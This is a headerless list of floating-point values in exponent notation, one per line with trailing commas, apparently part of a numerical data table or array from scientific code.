0.83225288e02,
0.89081558e02,
0.82212189e02,
0.66570000e02,
0.39153576e02,
0.50326321e02,
0.57166462e02,
0.56031170e02,
0.47971886e02,
0.36434990e02,
0.21253523e02,
0.28237167e02,
0.33642113e02,
0.34688950e02,
0.31254200e02,
0.25037840e02,
0.18253815e02,
0.11248275e02,
0.15133494e02,
0.18625698e02,
0.20033745e02,
0.18957489e02,
0.16075739e02,
0.12519300e02,
0.92340946e01,
0.62269855e01,
0.82350597e01,
0.10240828e02,
0.11357998e02,
0.11247568e02,
0.10105079e02,
0.84183950e01,
0.66705170e01,
0.51578894e01,
0.37987945e01,
0.48435707e01,
0.59637489e01,
0.67243404e01,
0.69045143e01,
0.65221829e01,
0.57613211e01,
0.48524532e01,
0.39752564e01,
0.32225568e01,
0.25505664e01,
0.31431477e01,
0.38052323e01,
0.43142323e01,
0.45352106e01,
0.44408669e01,
0.40962334e01,
0.36127684e01,
0.30965683e01,
0.26170671e01,
0.22043598e01,
0.18349921e01,
0.22099471e01,
0.26385496e01,
0.29933913e01,
0.31896119e01,
0.31966636e01,
0.30375271e01,
0.27696035e01,
0.24563296e01,
0.21455364e01,
0.18630074e01,
0.16174023e01,
0.13863298e01,
0.16447055e01,
0.19445310e01,
0.22046304e01,
0.23685496e01,
0.24110959e01,
0.23400669e01,
0.21870027e01,
0.19907905e01,
0.17838671e01,
0.15866874e01,
0.14085795e01,
0.12514458e01,
0.10881330e01,
0.12770401e01,
0.14988452e01,
0.16977799e01,
0.18342333e01,
0.18884524e01,
0.18623250e01,
0.17742110e01,
0.16486713e01,
0.15075257e01,
0.13662242e01,
0.12339157e01,
0.11142954e01,
0.10071722e01,
0.88128895e00,
0.10257436e01,
0.11969687e01,
0.13544649e01,
0.14691297e01,
0.15254281e01,
0.15228883e01,
0.14728941e01,
0.13916924e01,
0.12941229e01,
0.11911522e01,
0.10903227e01,
0.99648142e00,
0.91146982e00,
0.83437926e00,
0.73236907e00,
0.84691751e00,
0.98372436e00,
0.11120189e01,
0.12095475e01,
0.12638915e01,
0.12736813e01,
0.12464422e01,
0.11935405e01,
0.11255139e01,
0.10501394e01,
0.97279239e00,
0.89753741e00,
0.82755452e00,
0.76412642e00,
0.70607662e00,
0.62143141e00,
0.71498531e00,
0.82739562e00,
0.93439400e00,
0.10183749e01,
0.10692183e01,
0.10852710e01,
0.10717980e01,
0.10371528e01,
0.98918498e00,
0.93369889e00,
0.87458736e00,
0.81457925e00,
0.75610143e00,
0.70160747e00,
0.65229672e00,
0.60690910e00,
0.53620493e00,
0.61444676e00,
0.70891893e00,
0.79989344e00,
0.87304217e00,
0.91996312e00,
0.93897974e00,
0.93395931e00,
0.91129071e00,
0.87703383e00,
0.83570266e00,
0.79033947e00,
0.74295175e00,
0.69498348e00,
0.64796978e00,
0.60397410e00,
0.56429613e00,
0.52768981e00,
0.46893141e00,
0.53562319e00,
0.61647099e00,
0.69504291e00,
0.75940472e00,
0.80246264e00,
0.82262319e00,
0.82284969e00,
0.80819505e00,
0.78347129e00,
0.75227189e00,
0.71705294e00,
0.67947024e00,
0.64061898e00,
0.60127056e00,
0.56240505e00,
0.52581406e00,
0.49295956e00,
0.46267310e00,
0.41456842e00,
0.47228998e00,
0.54249328e00,
0.61122215e00,
0.66834646e00,
0.70778871e00,
0.72807664e00,
0.73156416e00,
0.72236371e00,
0.70439237e00,
0.68056595e00,
0.65288788e00,
0.62274611e00,
0.59110469e00,
0.55858999e00,
0.52560019e00,
0.49273926e00,
0.46156633e00,
0.43370983e00,
0.40812615e00,
0.36973703e00,
0.42031151e00,
0.48198968e00,
0.54273206e00,
0.59380746e00,
0.62994283e00,
0.64979416e00,
0.65528655e00,
0.64984703e00,
0.63673460e00,
0.61836016e00,
0.59637630e00,
0.57194269e00,
0.54589856e00,
0.51883745e00,
0.49112943e00,
0.46296096e00,
0.43467191e00,
0.40760121e00,
0.38351870e00,
0.36154264e00,
0.33207551e00,
0.37681752e00,
0.43150941e00,
0.48563948e00,
0.53159100e00,
0.56474036e00,
0.58386314e00,
0.59056675e00,
0.58775848e00,
0.57819819e00,
0.56391406e00,
0.54628950e00,
0.52629930e00,
0.50466305e00,
0.48191690e00,
0.45844156e00,
0.43446112e00,
0.41004205e00,
0.38533735e00,
0.36147287e00,
0.34032100e00,
0.32119045e00,
0.29983068e00,
0.33969635e00,
0.38853076e00,
0.43707687e00,
0.47863159e00,
0.50910699e00,
0.52738410e00,
0.53481984e00,
0.53390729e00,
0.52700996e00,
0.51585591e00,
0.50161958e00,
0.48513207e00,
0.46701470e00,
0.44774175e00,
0.42767024e00,
0.40705225e00,
0.38602614e00,
0.36459178e00,
0.34277132e00,
0.32148623e00,
0.30266759e00,
0.28583673e00,
0.27165741e00,
0.30735224e00,
0.35116890e00,
0.39490715e00,
0.43263298e00,
0.46071306e00,
0.47812337e00,
0.48601636e00,
0.48654056e00,
0.48172772e00,
0.47305444e00,
0.46152285e00,
0.44784895e00,
0.43257853e00,
0.41613755e00,
0.39885530e00,
0.38097894e00,
0.36268044e00,
0.34404564e00,
0.32503796e00,
0.30558982e00,
0.28643203e00,
0.26951250e00,
0.25458133e00,
0.24664548e00,
0.27872956e00,
0.31819224e00,
0.35773003e00,
0.39206341e00,
0.41795400e00,
0.43447414e00,
0.44261932e00,
0.44425684e00,
0.44113833e00,
0.43451858e00,
0.42523941e00,
0.41390744e00,
0.40100044e00,
0.38690761e00,
0.37194157e00,
0.35634446e00,
0.34029481e00,
0.32391262e00,
0.30725011e00,
0.29025167e00,
0.27279079e00,
0.25542563e00,
0.24008393e00,
0.22675417e00,
0.22445151e00,
0.25343820e00,
0.28914347e00,
0.32500827e00,
0.35629919e00,
0.38011837e00,
0.39564186e00,
0.40376574e00,
0.40615430e00,
0.40434766e00,
0.39941984e00,
0.39206272e00,
0.38276103e00,
0.37190381e00,
0.35982931e00,
0.34683278e00,
0.33315977e00,
0.31900054e00,
0.30449098e00,
0.28971705e00,
0.27470860e00,
0.25940111e00,
0.24363182e00,
0.22780687e00,
0.21380231e00,
0.20184751e00,
0.20519748e00,
0.23159876e00,
0.26413625e00,
0.29684672e00,
0.32543322e00,
0.34727564e00,
0.36164755e00,
0.36939174e00,
0.37204832e00,
0.37103242e00,
0.36731219e00,
0.36147776e00,
0.35390341e00,
0.34486532e00,
0.33460709e00,
0.32336712e00,
0.31137651e00,
0.29884037e00,
0.28591970e00,
0.27272525e00,
0.25932097e00,
0.24572186e00,
0.23185994e00,
0.21755250e00,
0.20307408e00,
0.19022347e00,
0.17946769e00,
0.18898228e00,
0.21327148e00,
0.24319792e00,
0.27327064e00,
0.29953399e00,
0.31957966e00,
0.33274972e00,
0.33984205e00,
0.34230980e00,
0.34150216e00,
0.33835727e00,
0.33344826e00,
0.32711285e00,
0.31955174e00,
0.31089956e00,
0.30128181e00,
0.29084933e00,
0.27977982e00,
0.26825124e00,
0.25640994e00,
0.24435396e00,
0.23213391e00,
0.21975470e00,
0.20714773e00,
0.19412118e00,
0.18083785e00,
0.16899987e00,
0.15930425e00,
0.17541476e00,
0.19795303e00,
0.22571321e00,
0.25359881e00,
0.27793473e00,
0.29647639e00,
0.30860057e00,
0.31503823e00,
0.31714112e00,
0.31618607e00,
0.31309542e00,
0.30847403e00,
0.30271024e00,
0.29603517e00,
0.28855911e00,
0.28031746e00,
0.27133235e00,
0.26166755e00,
0.25144571e00,
0.24082130e00,
0.22993420e00,
0.21887848e00,
0.20769787e00,
0.19639082e00,
0.18488961e00,
0.17300032e00,
0.16079190e00,
0.14985578e00,
0.14110740e00,
0.16366631e00,
0.18467116e00,
0.21054901e00,
0.23656210e00,
0.25929046e00,
0.27663431e00,
0.28799024e00,
0.29400581e00,
0.29590416e00,
0.29484844e00,
0.29169577e00,
0.28704572e00,
0.28133944e00,
0.27490255e00,
0.26794240e00,
0.26054066e00,
0.25267535e00,
0.24428359e00,
0.23534042e00,
0.22590491e00,
0.21610361e00,
0.20607288e00,
0.19590905e00,
0.18565454e00,
0.17530420e00,
0.16479163e00,
0.15392394e00,
0.14269111e00,
0.13256522e00,
0.12466694e00,
0.15291582e00,
0.17249423e00,
0.19663572e00,
0.22094680e00,
0.24225558e00,
0.25860691e00,
0.26942277e00,
0.27527362e00,
0.27725279e00,
0.27639005e00,
0.27343193e00,
0.26890206e00,
0.26321408e00,
0.25673062e00,
0.24976483e00,
0.24254556e00,
0.23517576e00,
0.22762197e00,
0.21976374e00,
0.21149129e00,
0.20278960e00,
0.19374785e00,
0.18449736e00,
0.17514092e00,
0.16572388e00,
0.15623912e00,
0.14661992e00,
0.13667518e00,
0.12632957e00,
0.11693286e00,
0.10979707e00,
0.14267196e00,
0.16087982e00,
0.18335804e00,
0.20604582e00,
0.22601375e00,
0.24145372e00,
0.25182438e00,
0.25763780e00,
0.25987828e00,
0.25945812e00,
0.25701439e00,
0.25296855e00,
0.24764267e00,
0.24133593e00,
0.23435625e00,
0.22701317e00,
0.21957387e00,
0.21219650e00,
0.20488037e00,
0.19748402e00,
0.18982655e00,
0.18181197e00,
0.17347980e00,
0.16495080e00,
0.15633532e00,
0.14768384e00,
0.13898759e00,
0.13017787e00,
0.12106603e00,
0.11152479e00,
0.10278418e00,
0.96333064e-01,
0.13278867e00,
0.14967601e00,
0.17054874e00,
0.19166234e00,
0.21031891e00,
0.22485405e00,
0.23476954e00,
0.24053511e00,
0.24305005e00,
0.24313784e00,
0.24135487e00,
0.23804264e00,
0.23343392e00,
0.22772875e00,
0.22114034e00,
0.21392128e00,
0.20636588e00,
0.19877388e00,
0.19137226e00,
0.18422794e00,
0.17721902e00,
0.17011781e00,
0.16274700e00,
0.15508358e00,
0.14722840e00,
0.13929746e00,
0.13134745e00,
0.12336826e00,
0.11528943e00,
0.10692697e00,
0.98114364e-01,
0.89966424e-01,
0.84133029e-01,
0.12330588e00,
0.13893479e00,
0.15827183e00,
0.17786814e00,
0.19524175e00,
0.20886324e00,
0.21827731e00,
0.22391967e00,
0.22662000e00,
0.22713451e00,
0.22596700e00,
0.22341314e00,
0.21965274e00,
0.21481460e00,
0.20901735e00,
0.20240258e00,
0.19516377e00,
0.18756257e00,
0.17991112e00,
0.17249928e00,
0.16548070e00,
0.15879016e00,
0.15218471e00,
0.14541364e00,
0.13838096e00,
0.13115591e00,
0.12385615e00,
0.11654575e00,
0.10921578e00,
0.10179584e00,
0.94108447e-01,
0.85958004e-01,
0.78349575e-01,
0.73076993e-01,
0.11430455e00,
0.12874915e00,
0.14663576e00,
0.16478880e00,
0.18092515e00,
0.19363941e00,
0.20251557e00,
0.20795847e00,
0.21073578e00,
0.21154700e00,
0.21085797e00,
0.20893978e00,
0.20595059e00,
0.20198931e00,
0.19712524e00,
0.19142093e00,
0.18495877e00,
0.17787308e00,
0.17037868e00,
0.16277534e00,
0.15539503e00,
0.14847951e00,
0.14204761e00,
0.13587566e00,
0.12965593e00,
0.12321350e00,
0.11657458e00,
0.10985404e00,
0.10312499e00,
0.96382633e-01,
0.89558579e-01,
0.82482606e-01,
0.74937083e-01,
0.67823343e-01,
0.63062489e-01,
0.10584079e00,
0.11918116e00,
0.13571160e00,
0.15250790e00,
0.16746905e00,
0.17930275e00,
0.18762796e00,
0.19281991e00,
0.19558841e00,
0.19658093e00,
0.19623034e00,
0.19479063e00,
0.19241145e00,
0.18918501e00,
0.18516850e00,
0.18039672e00,
0.17489515e00,
0.16870056e00,
0.16189243e00,
0.15463088e00,
0.14718156e00,
0.13989125e00,
0.13307634e00,
0.12685405e00,
0.12105249e00,
0.11533057e00,
0.10943508e00,
0.10333905e00,
0.97149357e-01,
0.90949543e-01,
0.84741533e-01,
0.78459755e-01,
0.71940817e-01,
0.64950287e-01,
0.58292422e-01,
0.53999700e-01,
0.97934157e-01,
0.11025076e00,
0.12552127e00,
0.14105226e00,
0.15490949e00,
0.16590366e00,
0.17368492e00,
0.17860012e00,
0.18130451e00,
0.18239634e00,
0.18227696e00,
0.18118428e00,
0.17926148e00,
0.17660023e00,
0.17325978e00,
0.16927499e00,
0.16466121e00,
0.15942113e00,
0.15355882e00,
0.14710733e00,
0.14017075e00,
0.13296603e00,
0.12582819e00,
0.11912578e00,
0.11307607e00,
0.10758535e00,
0.10230618e00,
0.96913703e-01,
0.91320075e-01,
0.85618503e-01,
0.79903029e-01,
0.74183889e-01,
0.68398476e-01,
0.62389236e-01,
0.55908926e-01,
0.49671900e-01,
0.45807466e-01,
0.90577021e-01,
0.10194721e00,
0.11605130e00,
0.13040775e00,
0.14323507e00,
0.15343815e00,
0.16069512e00,
0.16532598e00,
0.16793491e00,
0.16907367e00,
0.16911317e00,
0.16827461e00,
0.16669342e00,
0.16445951e00,
0.16163501e00,
0.15826119e00,
0.15436088e00,
0.14993919e00,
0.14498582e00,
0.13948333e00,
0.13342866e00,
0.12687427e00,
0.11998184e00,
0.11305442e00,
0.10648688e00,
0.10058656e00,
0.95354967e-01,
0.90465494e-01,
0.85533582e-01,
0.80405675e-01,
0.75155161e-01,
0.69885492e-01,
0.64615801e-01,
0.59286319e-01,
0.53744264e-01,
0.47732841e-01,
0.41884389e-01,
0.38411867e-01,
0.83746620e-01,
0.94243065e-01,
0.10726915e00,
0.12053798e00,
0.13240825e00,
0.14187106e00,
0.14862999e00,
0.15297991e00,
0.15547749e00,
0.15663114e00,
0.15678266e00,
0.15613645e00,
0.15481880e00,
0.15291539e00,
0.15048827e00,
0.14758278e00,
0.14422987e00,
0.14044581e00,
0.13623075e00,
0.13156785e00,
0.12642694e00,
0.12077967e00,
0.11463551e00,
0.10810074e00,
0.10143317e00,
0.95029272e-01,
0.89268476e-01,
0.84254339e-01,
0.79705626e-01,
0.75194120e-01,
0.70498869e-01,
0.65667070e-01,
0.60809318e-01,
0.55953730e-01,
0.51043399e-01,
0.45929730e-01,
0.40349029e-01,
0.34859274e-01,
0.31745121e-01,
0.77413671e-01,
0.87103941e-01,
0.99134557e-01,
0.11139757e00,
0.12238043e00,
0.13115339e00,
0.13744320e00,
0.14152151e00,
0.14390105e00,
0.14504991e00,
0.14528263e00,
0.14478727e00,
0.14368038e00,
0.14204189e00,
0.13993120e00,
0.13739403e00,
0.13446525e00,
0.13116941e00,
0.12751934e00,
0.12351336e00,
0.11913250e00,
0.11434042e00,
0.10909266e00,
0.10336579e00,
0.97215243e-01,
0.90846524e-01,
0.84636919e-01,
0.79015903e-01,
0.74187510e-01,
0.69935963e-01,
0.65807395e-01,
0.61514482e-01,
0.57072140e-01,
0.52595474e-01,
0.48121743e-01,
0.43596964e-01,
0.38876079e-01,
0.33690531e-01,
0.28531600e-01,
0.25744777e-01,
0.71547434e-01,
0.80494061e-01,
0.91605820e-01,
0.10293934e00,
0.11310040e00,
0.12123200e00,
0.12708212e00,
0.13090093e00,
0.13316067e00,
0.13429219e00,
0.13458471e00,
0.13421088e00,
0.13327757e00,
0.13185826e00,
0.13000821e00,
0.12777114e00,
0.12518245e00,
0.12227035e00,
0.11905541e00,
0.11554869e00,
0.11174847e00,
0.10763626e00,
0.10317403e00,
0.98308414e-01,
0.92992358e-01,
0.87237559e-01,
0.81194960e-01,
0.75207628e-01,
0.69733076e-01,
0.65067738e-01,
0.61075501e-01,
0.57294834e-01,
0.53375702e-01,
0.49295910e-01,
0.45172136e-01,
0.41050550e-01,
0.36880266e-01,
0.32519296e-01,
0.27695602e-01,
0.22840958e-01,
0.20352198e-01,
0.66117376e-01,
0.74378133e-01,
0.84641933e-01,
0.95116824e-01,
0.10451740e00,
0.11205351e00,
0.11749266e00,
0.12106522e00,
0.12320609e00,
0.12431186e00,
0.12464833e00,
0.12437376e00,
0.12358582e00,
0.12235164e00,
0.12072182e00,
0.11873700e00,
0.11643104e00,
0.11383259e00,
0.11096542e00,
0.10784754e00,
0.10448926e00,
0.10088971e00,
0.97032204e-01,
0.92879705e-01,
0.88374905e-01,
0.83454721e-01,
0.78095064e-01,
0.72394073e-01,
0.66651307e-01,
0.61332978e-01,
0.56815393e-01,
0.53050254e-01,
0.49585145e-01,
0.46012942e-01,
0.42270541e-01,
0.38473442e-01,
0.34676433e-01,
0.30831696e-01,
0.26799770e-01,
0.22306219e-01,
0.17730433e-01,
0.15513073e-01,
0.61093956e-01,
0.68722166e-01,
0.78203514e-01,
0.87885372e-01,
0.96582450e-01,
0.10356604e00,
0.10862161e00,
0.11196126e00,
0.11398555e00,
0.11505950e00,
0.11542739e00,
0.11523422e00,
0.11456916e00,
0.11349328e00,
0.11205266e00,
0.11028446e00,
0.10822011e00,
0.10588704e00,
0.10330941e00,
0.10050797e00,
0.97499035e-01,
0.94292536e-01,
0.90888672e-01,
0.87273069e-01,
0.83411098e-01,
0.79244599e-01,
0.74700132e-01,
0.69725469e-01,
0.64370766e-01,
0.58887802e-01,
0.53736102e-01,
0.49357101e-01,
0.45792568e-01,
0.42613342e-01,
0.39362472e-01,
0.35933696e-01,
0.32438610e-01,
0.28940061e-01,
0.25393331e-01,
0.21661280e-01,
0.17468622e-01,
0.13150477e-01,
0.11185951e-01,
0.56448560e-01,
0.63493401e-01,
0.72252735e-01,
0.81202179e-01,
0.89248493e-01,
0.95719531e-01,
0.10041723e00,
0.10353691e00,
0.10544755e00,
0.10648517e00,
0.10687432e00,
0.10674787e00,
0.10618718e00,
0.10524774e00,
0.10397130e00,
0.10239167e00,
0.10053762e00,
0.98434702e-01,
0.96106045e-01,
0.93572617e-01,
0.90852953e-01,
0.87962106e-01,
0.84909752e-01,
0.81697099e-01,
0.78312054e-01,
0.74722745e-01,
0.70871852e-01,
0.66679642e-01,
0.62072858e-01,
0.57060491e-01,
0.51846057e-01,
0.46870694e-01,
0.42625420e-01,
0.39239943e-01,
0.36319576e-01,
0.33365458e-01,
0.30227283e-01,
0.27010450e-01,
0.23785481e-01,
0.20511542e-01,
0.17054949e-01,
0.13141878e-01,
0.90698684e-02,
0.73469649e-02,
0.52153420e-01,
0.58660157e-01,
0.66753164e-01,
0.75026073e-01,
0.82470380e-01,
0.88465959e-01,
0.92829920e-01,
0.95742144e-01,
0.97542584e-01,
0.98540656e-01,
0.98942772e-01,
0.98870747e-01,
0.98398849e-01,
0.97577512e-01,
0.96444599e-01,
0.95030688e-01,
0.93361929e-01,
0.91461726e-01,
0.89351647e-01,
0.87051816e-01,
0.84580876e-01,
0.81955560e-01,
0.79189852e-01,
0.76293178e-01,
0.73267482e-01,
0.70102490e-01,
0.66768855e-01,
0.63210987e-01,
0.59346184e-01,
0.55086352e-01,
0.50406374e-01,
0.45463238e-01,
0.40671837e-01,
0.36558144e-01,
0.33334181e-01,
0.30647837e-01,
0.27966481e-01,
0.25096513e-01,
0.22136096e-01,
0.19164244e-01,
0.16145656e-01,
0.12950187e-01,
0.93025165e-02,
0.54607159e-02,
0.39474810e-02,
0.48182234e-01,
0.54192506e-01,
0.61670437e-01,
0.69318332e-01,
0.76205671e-01,
0.81760220e-01,
0.85813068e-01,
0.88529900e-01,
0.90223983e-01,
0.91180287e-01,
0.91588661e-01,
0.91560833e-01,
0.91164641e-01,
0.90445958e-01,
0.89439072e-01,
0.88171646e-01,
0.86667374e-01,
0.84947526e-01,
0.83031908e-01,
0.80939271e-01,
0.78687482e-01,
0.76293327e-01,
0.73772058e-01,
0.71136616e-01,
0.68396017e-01,
0.65552600e-01,
0.62597387e-01,
0.59503239e-01,
0.56216817e-01,
0.52654829e-01,
0.48719283e-01,
0.44357602e-01,
0.39683431e-01,
0.35080492e-01,
0.31097105e-01,
0.28020034e-01,
0.25545072e-01,
0.23114407e-01,
0.20494236e-01,
0.17775815e-01,
0.15046233e-01,
0.12272255e-01,
0.93193343e-02,
0.59020361e-02,
0.22407323e-02,
0.87492354e-03,
0.44510506e-01,
0.50062627e-01,
0.56972671e-01,
0.64043038e-01,
0.70415020e-01,
0.75560495e-01,
0.79323418e-01,
0.81856459e-01,
0.83448350e-01,
0.84361628e-01,
0.84770963e-01,
0.84778860e-01,
0.84447332e-01,
0.83818108e-01,
0.82922280e-01,
0.81784874e-01,
0.80427296e-01,
0.78868859e-01,
0.77127583e-01,
0.75220726e-01,
0.73164918e-01,
0.70976183e-01,
0.68669744e-01,
0.66259526e-01,
0.63757502e-01,
0.61172180e-01,
0.58505908e-01,
0.55750374e-01,
0.52880324e-01,
0.49845133e-01,
0.46562638e-01,
0.42928446e-01,
0.38867969e-01,
0.34455679e-01,
0.30041935e-01,
0.26187586e-01,
0.23246434e-01,
0.20965882e-01,
0.18771386e-01,
0.16391607e-01,
0.13906728e-01,
0.11403601e-01,
0.88423118e-02,
0.60800756e-02,
0.28280553e-02,
-0.70986536e-03,
-0.19648359e-02,
0.41115671e-01,
0.46244897e-01,
0.52630525e-01,
0.59167176e-01,
0.65062307e-01,
0.69828428e-01,
0.73321380e-01,
0.75681835e-01,
0.77175975e-01,
0.78045711e-01,
0.78451805e-01,
0.78488372e-01,
0.78212120e-01,
0.77661060e-01,
0.76863378e-01,
0.75841703e-01,
0.74615397e-01,
0.73201917e-01,
0.71617633e-01,
0.69878295e-01,
0.67999192e-01,
0.65995254e-01,
0.63880973e-01,
0.61670251e-01,
0.59375945e-01,
0.57009004e-01,
0.54577064e-01,
0.52082047e-01,
0.49516134e-01,
0.46855822e-01,
0.44053324e-01,
0.41028392e-01,
0.37672661e-01,
0.33894073e-01,
0.29732887e-01,
0.25506891e-01,
0.21783372e-01,
0.18975813e-01,
0.16882956e-01,
0.14915733e-01,
0.12760971e-01,
0.10479322e-01,
0.81534600e-02,
0.57432470e-02,
0.31131236e-02,
-0.13105665e-04,
-0.34361165e-02,
-0.45660972e-02,
0.37977196e-01,
0.42716030e-01,
0.48617344e-01,
0.54660756e-01,
0.60114693e-01,
0.64529106e-01,
0.67770794e-01,
0.69969401e-01,
0.71370378e-01,
0.72196685e-01,
0.72596297e-01,
0.72655670e-01,
0.72426699e-01,
0.71944013e-01,
0.71233213e-01,
0.70314772e-01,
0.69206156e-01,
0.67923151e-01,
0.66480570e-01,
0.64892717e-01,
0.63173585e-01,
0.61336990e-01,
0.59396494e-01,
0.57365343e-01,
0.55256244e-01,
0.53080887e-01,
0.50849102e-01,
0.48567444e-01,
0.46237227e-01,
0.43851011e-01,
0.41386928e-01,
0.38799874e-01,
0.36011849e-01,
0.32912444e-01,
0.29396715e-01,
0.25476838e-01,
0.21440787e-01,
0.17856820e-01,
0.15185956e-01,
0.13268581e-01,
0.11497635e-01,
0.95190108e-02,
0.73810630e-02,
0.51771011e-02,
0.28821086e-02,
0.37416635e-03,
-0.26154167e-02,
-0.58998531e-02,
-0.68843709e-02,
0.35076261e-01,
0.39454699e-01,
0.44908728e-01,
0.50496329e-01,
0.55542119e-01,
0.59630550e-01,
0.62638551e-01,
0.64685628e-01,
0.65998107e-01,
0.66781543e-01,
0.67172192e-01,
0.67249492e-01,
0.67060962e-01,
0.66638172e-01,
0.66004358e-01,
0.65178059e-01,
0.64175054e-01,
0.63009582e-01,
0.61695036e-01,
0.60244419e-01,
0.58670532e-01,
0.56986067e-01,
0.55203587e-01,
0.53335473e-01,
0.51393870e-01,
0.49390342e-01,
0.47335327e-01,
0.45237295e-01,
0.43101642e-01,
0.40929142e-01,
0.38712744e-01,
0.36432110e-01,
0.34044892e-01,
0.31476185e-01,
0.28615938e-01,
0.25350343e-01,
0.21667363e-01,
0.17823832e-01,
0.14378536e-01,
0.11824818e-01,
0.10038571e-01,
0.84049767e-02,
0.65482627e-02,
0.45205113e-02,
0.24313403e-02,
0.26542676e-03,
-0.20983638e-02,
-0.49343021e-02,
-0.80712391e-02,
-0.89136148e-02,
0.32395583e-01,
0.36441319e-01,
0.41482292e-01,
0.46648715e-01,
0.51316999e-01,
0.55103421e-01,
0.57894230e-01,
0.59799597e-01,
0.61028276e-01,
0.61769772e-01,
0.62149592e-01,
0.62240742e-01,
0.62086754e-01,
0.61716419e-01,
0.61150856e-01,
0.60406826e-01,
0.59498589e-01,
0.58439020e-01,
0.57240289e-01,
0.55914193e-01,
0.54472402e-01,
0.52926507e-01,
0.51288098e-01,
0.49568728e-01,
0.47779780e-01,
0.45932278e-01,
0.44036478e-01,
0.42101391e-01,
0.40134147e-01,
0.38139164e-01,
0.36116980e-01,
0.34061395e-01,
0.31954251e-01,
0.29756844e-01,
0.27398031e-01,
0.24767753e-01,
0.21741455e-01,
0.18279733e-01,
0.14604551e-01,
0.11262298e-01,
0.87792939e-02,
0.70768204e-02,
0.55486909e-02,
0.38075072e-02,
0.19052560e-02,
-0.45109729e-04,
-0.20623163e-02,
-0.42746197e-02,
-0.69636726e-02,
-0.99668913e-02,
-0.10686405e-01,
0.29919144e-01,
0.33657782e-01,
0.38317338e-01,
0.43094639e-01,
0.47413833e-01,
0.50920542e-01,
0.53509615e-01,
0.55282630e-01,
0.56432150e-01,
0.57132918e-01,
0.57500545e-01,
0.57602141e-01,
0.57477590e-01,
0.57153169e-01,
0.56648072e-01,
0.55977501e-01,
0.55154376e-01,
0.54190353e-01,
0.53096451e-01,
0.51883381e-01,
0.50561778e-01,
0.49142279e-01,
0.47635533e-01,
0.46052203e-01,
0.44402875e-01,
0.42697888e-01,
0.40947042e-01,
0.39159160e-01,
0.37341885e-01,
0.35501439e-01,
0.33642113e-01,
0.31765264e-01,
0.29866640e-01,
0.27930658e-01,
0.25920473e-01,
0.23763975e-01,
0.21344284e-01,
0.18521296e-01,
0.15230944e-01,
0.11671958e-01,
0.83932094e-02,
0.59620556e-02,
0.43443809e-02,
0.29380166e-02,
0.13360849e-02,
-0.42020026e-03,
-0.22225457e-02,
-0.40951176e-02,
-0.61711343e-02,
-0.87360274e-02,
-0.11627702e-01,
-0.12245870e-01,
0.27632145e-01,
0.31087343e-01,
0.35394758e-01,
0.39812610e-01,
0.43809064e-01,
0.47056779e-01,
0.49458548e-01,
0.51108032e-01,
0.52182894e-01,
0.52844279e-01,
0.53198714e-01,
0.53307895e-01,
0.53208377e-01,
0.52924160e-01,
0.52472707e-01,
0.51867817e-01,
0.51121201e-01,
0.50243411e-01,
0.49244415e-01,
0.48133992e-01,
0.46921846e-01,
0.45617707e-01,
0.44231363e-01,
0.42772591e-01,
0.41251190e-01,
0.39676767e-01,
0.38058497e-01,
0.36404900e-01,
0.34723751e-01,
0.33022195e-01,
0.31306833e-01,
0.29583117e-01,
0.27853649e-01,
0.26114259e-01,
0.24346959e-01,
0.22509510e-01,
0.20522581e-01,
0.18262342e-01,
0.15582572e-01,
0.12412144e-01,
0.89437887e-02,
0.57348427e-02,
0.33833538e-02,
0.18811167e-02,
0.61761297e-03,
-0.83635934e-03,
-0.24498748e-02,
-0.41174246e-02,
-0.58653555e-02,
-0.78286622e-02,
-0.10294430e-01,
-0.13095230e-01,
-0.13630256e-01,
0.25520688e-01,
0.28714316e-01,
0.32696646e-01,
0.36782503e-01,
0.40480625e-01,
0.43488596e-01,
0.45716532e-01,
0.47250807e-01,
0.48255347e-01,
0.48878800e-01,
0.49219336e-01,
0.49333718e-01,
0.49255468e-01,
0.49006518e-01,
0.48602745e-01,
0.48056658e-01,
0.47378853e-01,
0.46578914e-01,
0.45665938e-01,
0.44648807e-01,
0.43536380e-01,
0.42337555e-01,
0.41061286e-01,
0.39716586e-01,
0.38312454e-01,
0.36857765e-01,
0.35361193e-01,
0.33831026e-01,
0.32275263e-01,
0.30701900e-01,
0.29118838e-01,
0.27533358e-01,
0.25950057e-01,
0.24367830e-01,
0.22775861e-01,
0.21148378e-01,
0.19438008e-01,
0.17566392e-01,
0.15416590e-01,
0.12849388e-01,
0.97933495e-02,
0.64339326e-02,
0.33275706e-02,
0.10872351e-02,
-0.28362754e-03,
-0.14064757e-02,
-0.27260752e-02,
-0.42158812e-02,
-0.57702521e-02,
-0.74158944e-02,
-0.92886547e-02,
-0.11677106e-01,
-0.14403825e-01,
-0.14870039e-01,
0.23571694e-01,
0.26523935e-01,
0.30206172e-01,
0.33985410e-01,
0.37407782e-01,
0.40193867e-01,
0.42260528e-01,
0.43687437e-01,
0.44625875e-01,
0.45212984e-01,
0.45539256e-01,
0.45656916e-01,
0.45596711e-01,
0.45378670e-01,
0.45017261e-01,
0.44523854e-01,
0.43908067e-01,
0.43178570e-01,
0.42343616e-01,
0.41411307e-01,
0.40389728e-01,
0.39287016e-01,
0.38111381e-01,
0.36871076e-01,
0.35574421e-01,
0.34229808e-01,
0.32845549e-01,
0.31430013e-01,
0.29991681e-01,
0.28539073e-01,
0.27080379e-01,
0.25622051e-01,
0.24167063e-01,
0.22712942e-01,
0.21250511e-01,
0.19763654e-01,
0.18227577e-01,
0.16602959e-01,
0.14823279e-01,
0.12781378e-01,
0.10339825e-01,
0.74180500e-02,
0.41875704e-02,
0.12003324e-02,
-0.92070986e-03,
-0.21659597e-02,
-0.31659470e-02,
-0.43731593e-02,
-0.57607451e-02,
-0.72222133e-02,
-0.87847579e-02,
-0.10585406e-01,
-0.12914552e-01,
-0.15580352e-01,
-0.15989216e-01,
0.21772955e-01,
0.24502428e-01,
0.27907638e-01,
0.31403694e-01,
0.34571216e-01,
0.37151974e-01,
0.39069071e-01,
0.40396009e-01,
0.41272413e-01,
0.41824844e-01,
0.42136710e-01,
0.42256072e-01,
0.42211138e-01,
0.42020235e-01,
0.41696560e-01,
0.41250426e-01,
0.40690560e-01,
0.40024836e-01,
0.39260726e-01,
0.38405582e-01,
0.37466776e-01,
0.36451757e-01,
0.35368055e-01,
0.34223344e-01,
0.33025496e-01,
0.31782612e-01,
0.30503126e-01,
0.29195679e-01,
0.27868953e-01,
0.26531136e-01,
0.25188750e-01,
0.23845278e-01,
0.22500057e-01,
0.21148371e-01,
0.19782964e-01,
0.18395819e-01,
0.16978383e-01,
0.15516935e-01,
0.13982293e-01,
0.12313342e-01,
0.10401287e-01,
0.81002032e-02,
0.53164582e-02,
0.22110264e-02,
